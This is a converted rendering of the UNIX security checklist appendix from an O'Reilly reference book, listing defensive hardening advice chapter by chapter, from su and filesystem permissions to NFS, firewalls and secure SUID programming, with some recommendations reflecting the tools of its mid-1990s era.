[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

compromised. This protection includes use of removable media and encryption.<br />

Restrict access to the su command, or restrict the ability to su to user root.<br />

su to the user's ID when investigating problem reports rather than exploring as user root.<br />

Scan the files /var/adm/messages, /var/adm/sulog, or other appropriate log files on a regular basis<br />

for bad su attempts.<br />

A.1.1.4 Chapter 5: The <strong>UNIX</strong> Filesystem<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Learn about the useful options to your version of the ls command.<br />

If your system has ACLS, learn how to use them. Remember, do not depend on ACLS to protect<br />

files on NFS partitions.<br />

Set your umask to an appropriate value (e.g., 027 or 077).<br />

Never write SUID/SGID shell scripts.<br />

Periodically scan your system for SUID/SGID files.<br />

Disable SUID on disk partition mounts (local and remote) unless necessary.<br />

Determine if write, chmod, chown, and chgrp operations on files clear the SUID/SGID bits on<br />

your system. Get in the habit of checking files based on this information.<br />

Scan for device files on your system. Check their ownership and permissions to ensure that they<br />

are reasonable.<br />

If your system has "universes" or Context Dependent Files (CDFS), be sure that all your<br />

administrative actions actually scan all the files and directories on your system.<br />

A.1.1.5 Chapter 6: Cryptography<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Learn about the restrictions your government places on the use, export, and sale of cryptography.<br />

Consider contacting your legislators with your opinions on these laws, especially if they negatively<br />

impact your ability to protect your systems.<br />

Never use rot13 as an encryption method to protect data.<br />

Don't depend on the crypt command to protect anything particularly sensitive, especially if it is<br />

more than 1024 bytes in length.<br />

If you use the Data Encryption Standard (DES) algorithm for encryption, consider superencrypting<br />

with Triple-DES.<br />

Use the compress command (or similar compression system) on files before encrypting them.<br />

Learn how to use message digests. Obtain and install a message digest program (such as MD5).<br />

Never use a login password as an encryption key. Choose encryption keys as you would a<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (3 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

●<br />

password, however - avoid obvious or easily guessed words or patterns.<br />

Protect your encryption key as you would your password - don't write it down, put it in a shell file,<br />

or store it online.<br />

Protect your encryption programs against tampering.<br />

Avoid proprietary encryption methods whose strengths are not known.<br />

Consider obtaining a copy of the PGP software and making it available to your users. Use PGP to<br />

encrypt files and sensitive email, and to create and check digital signatures on important files.<br />

A.1.1.6 Chapter 7: Backups<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Make regular backups.<br />

Be certain that everything on your system is on your backups.<br />

Remember to update your backup regimen whenever you update your system or change its<br />

configuration.<br />

Make paper copies of critical files for comparison or rebuilding your system (e.g., /etc/passwd,<br />

/etc/rc, and /etc/fstab).<br />

Make at least every other backup onto a different tape to guard against media failure.<br />

Do not reuse a backup tape too many times, because the tapes will eventually fail.<br />

Try to restore a few files from your backup tapes on a regular basis.<br />

Make periodic archive backups of your entire system and keep them forever.<br />

Try to completely rebuild your system from a set of backup tapes to be certain that your backup<br />

procedures are complete.<br />

Keep your backups under lock and key.<br />

Do not store your backups in the same room as your computer system: consider off-site backup<br />

storage.<br />

Ensure that access to your backup tapes during transport and storage is limited to authorized and<br />

trusted individuals.<br />

If your budget and needs are appropriate, investigate doing backups across a network link to a "hot<br />

spare" site.<br />

Encrypt your backups, but escrow the keys in case you lose them.<br />

When using software that accesses files directly rather than through the raw devices, consider<br />

remounting the filesystems as read-only during backups to prevent changes to file access times.<br />

Make periodic paper copies of important files.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (4 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

A.1.1.7 Chapter 8: Defending Your Accounts<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Make sure that every account has a password.<br />

Make sure to change the password of every "default" account that came with your <strong>UNIX</strong>. system.<br />

If possible, disable accounts like uucp and daemon so that people cannot use them to log into your<br />

system.<br />

Do not set up accounts that run single commands.<br />

Instead of logging into the root account, log in to your own account and use su.<br />

Do not create "default" or "guest" accounts for visitors.<br />

If you need to set up an account that can run only a few commands, use the rsh restricted shell.<br />

Think about creating restricted filesystem accounts for special-purpose commands or users.<br />

Do not set up a single account that is shared by a group of people. Use the group ID mechanism<br />

instead.<br />

Monitor the format and contents of the /etc/passwd file.<br />

Put time/tty restrictions on login to accounts as appropriate.<br />

Disable dormant accounts on your computer.<br />

Disable the accounts of people on extended vacations.<br />

Establish a system by which accounts are always created with a fixed expiration date and must be<br />

renewed to be kept active.<br />

Do not declare network connections, modems, or public terminals as "secure" in the<br />

/etc/default/login or /etc/ttys files.<br />

Be careful who you put in the wheel group, as these people can use the su command to become the<br />

superuser (if applicable).<br />

If possible, set your systems to require the root password when rebooting in single-user mode.<br />

If your system supports the TCB/trusted path mechanism, enable it.<br />

If your system allows the use of a longer password than the standard crypt() uses, enable it. Tell<br />

your users to use longer passwords.<br />

Consider using some form of one-time password or token-based authentication, especially on<br />

accounts that may be used across a network link.<br />

Consider using the Distributed Computing Environment (DCE) or Kerberos for any local network<br />

of single-user workstations, if your vendor software allows it.<br />

Enable password constraints, if present in your software, to help prevent users from picking bad<br />

passwords. Otherwise, consider adding password screening or coaching software to assist your<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (5 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

users in picking good passwords.<br />

Consider cracking your own passwords periodically, but don't place much faith in results that show<br />

no passwords cracked.<br />

If you have shadow password capability, enable it. If your software does not support a shadow<br />

password file, contact the vendor and request that such support be added.<br />

If your system does not have a shadow password file, make sure that the file /etc/passwd cannot be<br />

read anonymously over the network via UUCP or TFTP.<br />

If your computer supports password aging, set a lifetime between one and six months.<br />

If you have source code for your operating system, you may wish to slightly alter the algorithm<br />

used by crypt() to encrypt your password. For example, you can increase the number of encryption<br />

rounds from 25 to 200.<br />

If you are using a central mail server or firewall, consider the benefits of account-name aliasing.<br />

A.1.1.8 Chapter 9: Integrity Management<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

If your system supports immutable files, use them. If you don't have them, consider asking your<br />

vendor when they will be supported in your version of <strong>UNIX</strong>.<br />

If possible, mount disks read-only if they contain system software.<br />

Make a checklist listing the size, modification time, and permissions of every program on your<br />

system. You may wish to include cryptographic checksums in the lists. Keep copies of this<br />

checklist on removable media and use them to determine if any of your system files or programs<br />

have been modified.<br />

Write a daily check script to check for unauthorized changes to files and system directories.<br />

Double check the protection attributes on system command and data files, on their directories, and<br />

on all ancestor directories.<br />

If you export filesystems containing system programs, you may wish to export these filesystems<br />

read-only, so that they cannot be modified by NFS clients.<br />

Consider making all files on NFS-exported disks owned by user root.<br />

If you have backups of critical directories, you can use comparison checking to detect<br />

unauthorized modifications. Be careful to protect your backup copies and comparison programs<br />

from potential attackers.<br />

Consider running rdist from a protected system on a regular basis to report changes.<br />

Make an offline list of every SUID and SGID file on your system.<br />

Consider installing something to check message digests of files (e.g., Tripwire). Be certain that the<br />

program and all its data files are stored on read-only media or protected with encryption (or both).<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (6 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

A.1.1.9 Chapter 10: Auditing and Logging<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Consider installing a dedicated PC or other non-<strong>UNIX</strong> machine as a network log host.<br />

Have your users check the last login time each time they log in to make sure that nobody else is<br />

using their accounts.<br />

Consider installing a simple cron task to save copies of the lastlog file to track logins.<br />

Evaluate whether C2 logging on your system is practical and appropriate. If so, install it.<br />

Determine if there is an intrusion-detection and/or audit-reduction tool available to use with your<br />

C2 logs.<br />

Make sure that your utmp file is not world writable.<br />

Turn on whatever accounting mechanism you may have that logs command usage.<br />

Run last periodically to see who has been using the system. Use this program on a regular basis.<br />

Review your specialized log files on a regular basis. This review should include (if they exist on<br />

your system) loginlog, sulog, aculog, xferlog, and others.<br />

Consider adding an automatic log monitor such as Swatch.<br />

Make sure that your log files are on your daily backups before they get reset.<br />

If you have syslog, configure it so that all auth messages are logged to a special file. If you can,<br />

also have these messages logged to a special hardcopy printer and to another computer on your<br />

network.<br />

Be aware that log file entries may be forged and misleading in the event of a carefully crafted<br />

attack.<br />

Keep a paper log on a per-site and per-machine basis.<br />

If you process your logs in an automated fashion, craft your filters so that they exclude the things<br />

you don't want rather than pass only what you do want. This approach will ensure that you see all<br />

exceptional condition messages.<br />

A.1.1.10 Chapter 11: Protecting Against Programmed Threats<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Be extremely careful about installing new software. Never install binaries obtained from<br />

untrustworthy sources (like the Usenet).<br />

When installing new software, install it first on a noncritical system on which you can test it and<br />

observe any misbehavior or bugs.<br />

Run integrity checks on your system on a regular basis (see Chapter 9).<br />

Don't include nonstandard directories in your execution path.<br />

Don't leave any bin or library directories writable by untrustworthy accounts.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (7 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Set permissions on commands to prevent unauthorized alteration.<br />

Scan your system for any user home directories or dot files that are world writable or group<br />

writable.<br />

If you suspect a network-based worm attack or a virus in widely circulated software, call a FIRST<br />

response team or the vendor to confirm the instance before spreading any alarm.<br />

Never write or use SUID or SGID shell scripts unless you are a hoary <strong>UNIX</strong> wizard.<br />

Disable terminal answer-back, if possible.<br />

Never have "." (the current directory) in your search path. Never have writable directories in your<br />

search path.<br />

When running as the superuser, get in the habit of typing full pathnames for commands.<br />

Check the behavior of your xargs and find commands. Review the use of these commands (and the<br />

shell) in all scripts executed by cron.<br />

Watch for unauthorized modification to initialization files in any user or system account, including<br />

editor start-up files, .forward files, etc.<br />

Periodically review all system start-up and configuration files for additions and changes.<br />

Periodically review mailer alias files for unauthorized changes.<br />

Periodically review configuration files for server programs (e.g., inetd.conf).<br />

Check the security of your at program, and disable the program if necessary.<br />

Verify that any files run from the cron command files cannot be altered or replaced by<br />

unauthorized users.<br />

Don't use the vi or ex editors in a directory without first checking for a Trojan .exrc file. Disable<br />

the automatic command execution feature in GNU Emacs.<br />

Make sure that the devices used for backups are not world readable.<br />

Make sure that any shared libraries are properly protected and that protections cannot be<br />

overridden.<br />

A.1.1.11 Chapter 12: Physical <strong>Sec</strong>urity<br />

●<br />

●<br />

●<br />

Develop a physical security plan that includes a description of your assets, environment, threats,<br />

perimeter, and defenses.<br />

Determine who might have physical access to any of your resources under any circumstances.<br />

Have heat and smoke alarms in your computer room. If you have a raised floor, install alarm<br />

sensors both above and below the floor. If you have a dropped ceiling, put sensors above the<br />

ceiling, too.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (8 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Check the placement and recharge status of fire extinguishers on a regular basis.<br />

Make sure that personnel know how to use all fire protection and suppression equipment.<br />

Make sure that the placement and nature of fire-suppression systems will not endanger personnel<br />

or equipment more than is necessary.<br />

Have water sensors installed above and below raised floors in your computer room.<br />

Train your users and operators about what to do when an alarm sounds.<br />

Strictly prohibit smoking, eating, and drinking in your computer room or near computer<br />

equipment.<br />

Install and regularly clean air filters in your computer room.<br />

Place your computer systems where they will be protected in the event of earthquake, explosion, or<br />

structural failure.<br />

Keep your backups offsite.<br />

Have temperature and humidity controls in your computer room. Have alarms associated with the<br />

systems to indicate if values get out of range. Have recorders to monitor these values over time.<br />

Beware of insects trying to "bug" your computers.<br />

Install filtered power and/or surge protectors for all your computer equipment. Consider installing<br />

an uninterruptible power supply, if appropriate.<br />

Have antistatic measures in place.<br />

Store computer equipment and magnetic media away from building structural steel members that<br />

might conduct electricity after a lightning strike.<br />

Lock and physically isolate your computers from public access.<br />

Consider putting motion alarms or other protections in place to protect valuable equipment when<br />

personnel are not present.<br />

Protect power switches and fuses.<br />

Avoid having glass walls or large windows in your computer room.<br />

Protect all your network cables, terminators, and connectors from tampering. Examine them<br />

periodically.<br />

Use locks, tie-downs, and bolts to keep computer equipment from being carried away.<br />

Encrypt sensitive data held on your systems.<br />

Have disaster-recovery and business-continuation plans in place.<br />

Consider using fiber optic cable for networks.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (9 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Physically protect your backups and test them periodically.<br />

Sanitize media (e.g., tapes and disks) and printouts before disposal. Use bulk erasers, shredders, or<br />

incinerators.<br />

Check peripheral devices for local onboard storage that can lead to disclosure of information.<br />

Consider encrypting all of your backups and offline storage.<br />

Never use programmable function keys on a terminal for login or password information.<br />

Consider setting autologout on user accounts.<br />

A.1.1.12 Chapter 13: Personnel <strong>Sec</strong>urity<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Conduct background checks of individuals being considered for sensitive positions. Do so with the<br />

permission of the applicants.<br />

If the position is extremely sensitive, and if it is legally allowable, consider using a polygraph<br />

examination of the candidate.<br />

Have applicants and contractors in sensitive positions obtain bonding.<br />

Provide comprehensive and appropriate training for all new personnel, and for personnel taking on<br />

new assignments.<br />

Provide refresher training on a regular basis.<br />

Make sure that staff have adequate time and resources to pursue continuing education<br />

opportunities.<br />

Institute an ongoing user security-awareness program.<br />

Have regular performance reviews and monitoring. Try to resolve potential problems before they<br />

become real problems.<br />

Make sure that users in sensitive positions are not overloaded with work, responsibility or stress on<br />

a frequent or regular basis, even if compensated for the overload. In particular, users should be<br />

required to take holiday and vacation leave regularly.<br />

Monitor users in sensitive positions (without intruding on their privacy) for signs of excess stress<br />

or personal problems.<br />

Audit access to equipment and critical data.<br />

Apply policies of least privilege and separation of duties where applicable.<br />

When any user leaves the organization, make sure that access is properly terminated and duties<br />

transferred.<br />

Make sure that no user becomes irreplaceable.<br />

A.1.1.13 Chapter 14: Telephone <strong>Sec</strong>urity<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (10 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Make sure that incoming modems automatically log out the user if the telephone call gets<br />

interrupted.<br />

Make sure that incoming modems automatically hang up on an incoming call if the caller logs out<br />

or if the caller's login process gets killed.<br />

Make sure that outgoing modems hang up on the outgoing call if the tip or cu program is exited.<br />

Make sure that the tip or cu programs automatically exit if the user gets logged out of the remote<br />

machine or if the telephone call is interrupted.<br />

Make sure that there is no way for the local user to reprogram the modem.<br />

Do not install call forwarding on any of your incoming lines.<br />

Consider getting CALLER*ID/ANI to trace incoming calls automatically. Log the numbers that<br />

call your system.<br />

Physically protect the modems and phone lines.<br />

Disable third-party billing to your modem lines.<br />

Consider getting leased lines and/or callback modems.<br />

Consider using separate callout telephone lines with no dial-in capability for callback schemes.<br />

Check permissions on all associated devices and configuration files.<br />

Consider use of encrypting modems with fixed keys to guard against unauthorized use or<br />

eavesdropping.<br />

A.1.1.14 Chapter 15: UUCP<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Be sure that every UUCP login has a unique password.<br />

Set up a different UUCP login for every computer you communicate with via UUCP.<br />

Make sure that /usr/lib/uucp/L.sys or /usr/lib/uucp/Systems is mode 400, readable only by the<br />

UUCP user.<br />

Do not export UUCP files or commands on a writable NFS partition.<br />

Make sure that the files in the /usr/lib/uucp directories can't be read or written remotely or locally<br />

with the UUCP system.<br />

Make sure that no UUCP login has /usr/spool/uucp/uucppublic for its home directory.<br />

Limit UUCP access to the smallest set of directories necessary.<br />

If there are daily, weekly, or monthly administrative scripts run by cron to clean up the UUCP<br />

system, make sure that they are run with the UUCP UID but that they are owned by root.<br />

Make sure that the ruusend command is not in your L.cmds file (Version 2 UUCP.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (11 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Only allow execution of commands by UUCP that are absolutely necessary.<br />

Consider making some or all of your UUCP connections use callback to initiate a connection.<br />

Make sure that mail to the UUCP users gets sent to the system administrator.<br />

Test your mailer to make sure that it will not deliver a file or execute a command that is<br />

encapsulated in an address.<br />

Disable UUCP over IP unless you need UUCP.<br />

If the machine has an active FTP service, ensure that all UUCP users are listed in the /etc/ftpusers<br />

file.<br />

Be sure that the UUCP control files are protected and cannot be read or modified using the UUCP<br />

program.<br />

Only give UUCP access to the directories to which it needs access. You may wish to limit UUCP<br />

to the directory /usr/spool/uucppublic.<br />

Limit the commands which can be executed from offsite to those that are absolutely necessary.<br />

Disable or delete any uucpd daemon if you aren't using it.<br />

Remove all of the UUCP software and libraries if you aren't going to use them.<br />

A.1.1.15 Chapter 16: TCP/IP Networks<br />

●<br />

●<br />

●<br />

Consider low-level encryption mechanisms in enterprise networks, or to "tunnel" through external<br />

networks.<br />

Do not depend on IP addresses or DNS information for authentication.<br />

Do not depend on header information in news articles or email as they can be forged.<br />

A.1.1.16 Chapter 17: TCP/IP Services<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Routinely examine your inetd configuration file.<br />

If your standard software does not offer this level of control, consider installing the tcpwrapper<br />

program to better regulate and log access to your servers. Then, contact your vendor and ask when<br />

equivalent functionality will be provided as a standard feature in the vendors' systems.<br />

Disable any unneeded network services.<br />

Consider disabling any services that provide nonessential information to outsiders that might<br />

enable them to gather information about your systems.<br />

Make sure that your version of the ftpd program is up to date.<br />

If you support anonymous FTP, don't have a copy of your real /etc/passwd as an ~ftp/etc/passwd.<br />

Make sure that /etc/ftpusers contains at least the account names root, uucp, and bin. The file<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (12 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

should also contain the name of any other account that does not belonged to an actual human<br />

being.<br />

Frequently scan the files in, and usage of, your ftp account.<br />

Make sure that all directory permissions and ownership on your ftp account are set correctly.<br />

If your software allows, configure any "incoming" directories so that files dropped off cannot then<br />

be uploaded without operator intervention.<br />

Make sure that your sendmail program will not deliver mail directly to a file.<br />

Make sure that your sendmail program does not have a wizard's password set in the configuration<br />

file.<br />

Limit the number of "trusted users" in your sendmail.cf file.<br />

Make sure that your version of the sendmail program does not support the debug, wiz, or kill<br />

commands.<br />

Delete the "decode" alias in your aliases file. Examine carefully any other alias that delivers to a<br />

program or file.<br />

Make sure that your version of the sendmail program is up to date, with all published patches in<br />

place.<br />

Make sure that the aliases file cannot be altered by unauthorized individuals.<br />

Consider replacing sendmail with smap, or another more tractable network agent.<br />

Have an alias for every non-user account so that mail to any valid address gets delivered to a<br />

person and not to an unmonitored mailbox.<br />

Consider disabling SMTP commands such as VRFY and EXPN with settings in your sendmail<br />

configuration.<br />

Disable zone transfers in your DNS, if possible.<br />

Make sure that you are running the latest version of the nameserver software (e.g., bind) with all<br />

patches applied.<br />

Make sure that all files used by the nameserver software are properly protected against tampering,<br />

and perhaps against reading by unauthorized users.<br />

Use IP addresses instead of domain names in places where the practice makes sense (e.g., in<br />

.rhosts files). (But beware that most implementations of trusted commands don't understand IP<br />

addresses in .rhosts, and that, in such cases, doing this might introduce a vulnerability.)<br />

Make sure that TFTP access, if enabled, is limited to a single directory containing boot files.<br />

Tell your users about the information that the finger program makes available on the network.<br />

Make sure that your finger program is more recent than November 5, 1988.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (13 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Disable or replace the finger service with something that provides less information.<br />

If you are using POP or IMAP, configure your system to use APOP or Kerberos for authentication.<br />

Consider running the authd daemon for all machines in the local net.<br />

Configure your NNTP or INND server to restrict who can post articles or transfer Usenet news.<br />

Make sure that you have the most recent version of the software.<br />

Block NTP connections from outside your organization.<br />

Block SNMP connections from outside your organization.<br />

Disable rexec service unless needed.<br />

Routinely scan your system for suspicious .rhosts files. Make sure that all existing .rhosts files are<br />

protected to mode 600.<br />

Consider not allowing users to have .rhosts files on your system.<br />

If you have a plus sign (+) in your /etc/hosts.equiv file, remove it.<br />

Do not place usernames in your /etc/hosts.equiv file.<br />

Restrict access to your printing software via the /etc/hosts.lpd file.<br />

Make your list of trusted hosts as small as possible.<br />

Block incoming RIP packets; use static routes where possible and practical.<br />

Disable UUCP over IP unless needed.<br />

Set up your logindevperm or fbtab files to restrict permissions on frame buffers and devices, if this<br />

is possible on your system.<br />

If your X11 Server blocks on null connections, get an updated version.<br />

Enable the best X11 authentication possible in your configuration (e.g., Kerberos, <strong>Sec</strong>ure RPC,<br />

"magic cookies") instead of using xhost.<br />

Disable the rexd RPC service.<br />

Be very cautious about installing MUDS, IRCS, or other servers.<br />

Scan your network connections regularly with netstat.<br />

Scan your network with tools such as SATAN and ISS to determine if you have uncorrected<br />

vulnerabilities - before an attacker does the same.<br />

Re-evaluate why you are connected to the network at all, and disconnect machines that do not<br />

really need to be connected.<br />

A.1.1.17 Chapter 18: WWW <strong>Sec</strong>urity<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (14 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Consider running any WWW server from a Macintosh platform instead of from a <strong>UNIX</strong> platform.<br />

Do not run your server as user root. Have it set to run as a nobody user unique to the WWW<br />

service.<br />

Become familiar with all the configuration options for the particular server you use, and set its<br />

options appropriately (and conservatively).<br />

Disable automatic directory listings.<br />

Set the server to not follow symbolic links, or to only follow links that are owned by the same user<br />

that owns the destination of the link.<br />

Limit or prohibit server-side includes.<br />

Be extremely cautions about writing and installing CGI scripts or programs. (See the specific<br />

programming recommendations in the chapter.) Consider using taintperl as the implementation<br />

language.<br />

Configure your server to only allow CGI scripts from a particular directory under your control.<br />

Do not mix WWW and FTP servers on the same machine in the same filesystem hierarchy.<br />

Consider making your WWW server chroot into a protected directory.<br />

Monitor the logs and usage of your WWW service.<br />

If you are transferring sensitive information over the WWW connection (e.g., personal<br />

information), enable encryption.<br />

Prevent general access to the server log files.<br />

Be aware of the potential risks posed by dependence on a limited number of third-party providers.<br />

A.1.1.18 Chapter 19: RPC, NIS, NIS+, and Kerberos<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Enable Kerberos or <strong>Sec</strong>ure RPC if possible.<br />

Use NIS+ in preference to NIS, if possible.<br />

Use netgroups to restrict access to services, including login.<br />

Put keylogout in your logout file if you are running secure RPC.<br />

Make sure that your version of ypbind only listens on privileged ports.<br />

Make sure that your version of portmapper does not do proxy forwarding.<br />

If your version of portmapper has a "securenets" feature, configure the program so that it restricts<br />

which machines can send requests to your portmapper. If this feature is not present, contact your<br />

vendor and ask when it will be supported.<br />

Make sure that there is an asterisk (*) in the password field of any line beginning with a plus sign<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (15 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

(+) in both the passwd and group files of any NIS client.<br />

Make sure that there is no line beginning with a plus sign (+) in the passwd or group files on any<br />

NIS server.<br />

If you are using Kerberos, understand its limitations.<br />

A.1.1.19 Chapter 20: NFS<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Program your firewall and routers to block NFS packets.<br />

Use NFS version 3, if available, in TCP mode.<br />

Use the netgroups mechanism to restrict the export of (and thus the ability to remotely mount)<br />

filesystems to a small set of local machines.<br />

Mount partitions nosuid unless SUID access is absolutely necessary.<br />

Mount partitions nodev, if available.<br />

Set root ownership on files and directories mounted remotely.<br />

Never export a mounted partition on your system to an untrusted machine if the partition has any<br />

world- or group-writable directories.<br />

Set the kernel portmon variable to ignore NFS requests from unprivileged ports.<br />

Export filesystems to a small set of hosts, using the access= or ro= options.<br />

Do not export user home directories in a writable mode.<br />

Do not export filesystems to yourself!<br />

Do not use the root= option when exporting filesystems unless absolutely necessary.<br />

Use fsirand on all partitions that are exported. Rerun the program periodically.<br />

When possible, use the secure option for NFS mounts.<br />

Monitor who is mounting your NFS partitions (but realize that you may not have a complete<br />

picture because of the stateless nature of NFS).<br />

Reconsider why you want to use NFS, and think about doing without. For instance, replicating<br />

disk on local machines may be a safer approach.<br />

A.1.1.20 Chapter 21: Firewalls<br />

●<br />

●<br />

●<br />

Keep in mind that firewalls should be used in addition to other security measure and not in place<br />

of them.<br />

Consider setting a policy of default deny for your firewall.<br />

Consider internal firewalls as well as external firewalls.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (16 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Use the most complete firewall you can afford and one that makes sense in your environment. At<br />

the very least, put a screening router in place.<br />

Consider buying a commercially provided and configured firewall, rather than creating your own.<br />

Plan on centralizing services such as DNS, email, and Usenet on closely guarded bastion hosts.<br />

Break your network up into small, independent subnets. Each subnet should have its own NIS<br />

server and netgroups domain.<br />

Don't configure any machine to trust machines outside the local subnet.<br />

Make sure that user accounts have different passwords for machines on different subnets.<br />

Make sure that firewall machines have the highest level of logging.<br />

Configure firewall machines without user accounts and program development utilities, if possible.<br />

Don't mount NFS directories across subnet boundaries.<br />

Have a central mail machine with MX aliasing and name rewriting.<br />

Monitor activity on the firewall regularly.<br />

Configure your firewall/bastion hosts to remove all unnecessary services and utilities.<br />

Keep in mind that firewalls can sometimes fail. Plan accordingly: periodically test your firewall<br />

and have defense in depth for that eventuality.<br />

Give serious thought to whether or not you really want all your systems to be connected to the rest<br />

of the world, even if a firewall is interposed. (See the discussion in the chapter.)<br />

A.1.1.21 Chapter 22: Wrappers and Proxies<br />

●<br />

●<br />

●<br />

●<br />

Consider installing the smap proxy in place of the sendmail program to receive mail over the<br />

network.<br />

Consider installing the tcpwrapper program to restrict and log access to local network services.<br />

Consider installing the ident/authd service on your system to help track network access. However,<br />

remember that the results returned by this service are not completely trustworthy.<br />

Consider writing your own wrapper programs to provide extra control or logging for your local<br />

system.<br />

A.1.1.22 Chapter 23: Writing <strong>Sec</strong>ure SUID and Network Programs<br />

●<br />

●<br />

●<br />

Convey to your vendors your concern about software quality in their products.<br />

Observe the 24 general rules presented in the chapter when writing any software, and especially<br />

when writing software that needs extra privileges or trust.<br />

Observe the 17 general rules presented in the chapter when writing any network server programs.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (17 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

●<br />

Observe the 14 general rules presented in the chapter when writing any program that will be SUID<br />

or SGID.<br />

Think about using chroot for privileged programs.<br />

Avoid storing or transmitting passwords in clear text in any application.<br />

Be very cautious about generating and using "random" numbers.<br />

